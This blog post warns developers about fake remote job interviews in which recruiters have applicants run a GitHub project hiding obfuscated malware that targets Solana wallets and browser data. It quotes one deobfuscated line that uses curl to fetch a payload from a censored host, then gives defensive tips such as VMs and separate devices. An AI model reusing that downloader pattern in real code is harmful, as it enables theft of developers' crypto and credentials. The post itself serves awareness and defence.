Logo

dev-resources.site

for different kinds of informations.

You Could Lose All Your Crypto In a Job Interview

Published at
12/16/2024
Categories
opinion
hacking
cybersecurity
crypto
Author
zeedu_dev
Author
9 person written this
zeedu_dev
open
You Could Lose All Your Crypto In a Job Interview

The other day I was browsing Elon Musk’s political propaganda machine, also known as X, and came across this gem of human shamelessness, an interviewer who nearly hacked one of his applicants.

Running malware in job interviews.

The story goes like this: you’re in need of a job, you’re attending the interview remotely, the recruiter asks you to clone a Github library to find bugs in the code, an average interview for a developer position, all looks normal up to this point. Of course you, in need of a good job, decide to go through with the process.

Well, this guy was smart enough to read the code to be executed before blindly executing his voluminous node_modules directory. And what did he find? A succulent and delicious minimized code, also obfuscated and with hints of putting your computer to mine cryptocurrencies.

Our friend was like George, curious, so he reformated the code and found:

  • Lines that appear to search and read the contents of Solana wallets.
  • Scripts that scan browser directories.
  • API calls to an IP address, with no domain, some with no response at all and some that download obfuscated Python scripts (I guess it follows up the hacking process by installing a backdoor or some RAT).

If you want to infect yourself read the code, visit the github repository, I take no responsibility for anything.

_0x42b722(“curl -Lo” + _0x157519 + “\” + “http://<censored>/pdown” + “\””, (_0x204dd7, _0x6e1c16, _0x52b515) => {
  if (_0x204dd7) {
    _0x517b73 = 0;
    return void _0x70af27();
  })

Enter fullscreen mode Exit fullscreen mode

How do we avoid falling into these traps?

I don’t plan to stand alone in the drama. This is about offering some practical solutions so that script kiddies don’t make fun of you:

Use a different device.

The most comfortable option, but also the most expensive, keep your devices separate, use one computer for work and technical interviews and another for your personal stuff, cryptocurrencies included.

Read the code, whenever possible.

Recruiter sends you a script? Examine it carefully before you run it. Yes, I know, sometimes the code is too long or obfuscated, but if you have some experience, you can quickly examine the screen with your eyes and spot the most obvious red flags. Of course, you can’t waste all afternoon on this either especially if you’re in a real interview or value your time.

Use a virtual machine.

Mount a virtual machine, either Virtual Box or Gnome Boxes, on Linux, or a completely isolated Docker container, if you don’t mind not having a graphical interface.

Another option available, and my favorite: a live USB with the distribution of your choice (Debian, Fedora, or whatever you want),

That way, the worst that can happen is that they infect your virtual machine and not your real computer with all your personal information. Just be careful with shared volumes! If you mount your hard drive in the VM, you’re toast.

Encrypt your sensitive information.

Here comes in the classic advice from old-school IT veterans: encrypt your important data. If someone manages to access your collection of kitten memes, encrypt them.

I don’t plan to offer details because there is already too much on the internet, Google GPG or read the manual directly, if you are not that familiar with the terminal or don’t care, there are tools like Kleopatra, which make cryptography more intuitive to use.

Don’t run arbitrary code on your personal machine.

Do you have better ideas to protect us from these practices? Drop your tips on social media and tag me. I look forward to adding your suggestions to the post.

If you want to read the full story give Elon’s blog a visit…. I mean X.

opinion Article's
30 articles in total
Favicon
Human Writing in the Age of AI
Favicon
You Could Lose All Your Crypto In a Job Interview
Favicon
The Digital Canary: Decoding Telegram's Silences
Favicon
The Ghost of AI Past, Present, and Future
Favicon
Capitalis Sa
Favicon
private vs #private
Favicon
What makes Rust so difficult to learn?
Favicon
Navigating the Double-Edged Sword of AI as a Software Developer
Favicon
Be careful of Shiny Object Syndrome and FOMO in web development
Favicon
Do MVPs Fail Us?
Favicon
Web Developers, AI, and Development Fundamentals
Favicon
Your UI Doesn't Matter
Favicon
Apple lanza su IA centrada en la privacidad: un nuevo paradigma para la inteligencia artificial
Favicon
Apple Launches Its Privacy-Focused AI: A New Paradigm for Artificial Intelligence
Favicon
Apple Lança sua IA com Foco na Privacidade: Um Novo Paradigma para a Inteligência Artificial
Favicon
Engineering vs Craftsmanship
Favicon
How the Bathroom app offers a real-life solution to a real-world problem
Favicon
How to avoid spam when putting an email on a website?
Favicon
How to improve Django Framework?
Favicon
Why should you use Django Framework?
Favicon
My Analysis Of Anti Bot Captchas and their Advantages And Disadvantages
Favicon
I Am So Sick of Leetcode-Style Interviews
Favicon
My Top 5 Favorite Algorithm Problems at Codewars
Favicon
REST API: Best practices and design
Favicon
Digital Ocean, analysis and my experience as a user
Favicon
How to scale a Django application to serve one million users?
Favicon
Devin AI Will this AI Replace Programmers?
Favicon
Pi Zero 2 W - First thoughts
Favicon
REST API basic characteristics and recommendations
Favicon
My mistakes regarding the tech SEO optimization of my website

Featured ones: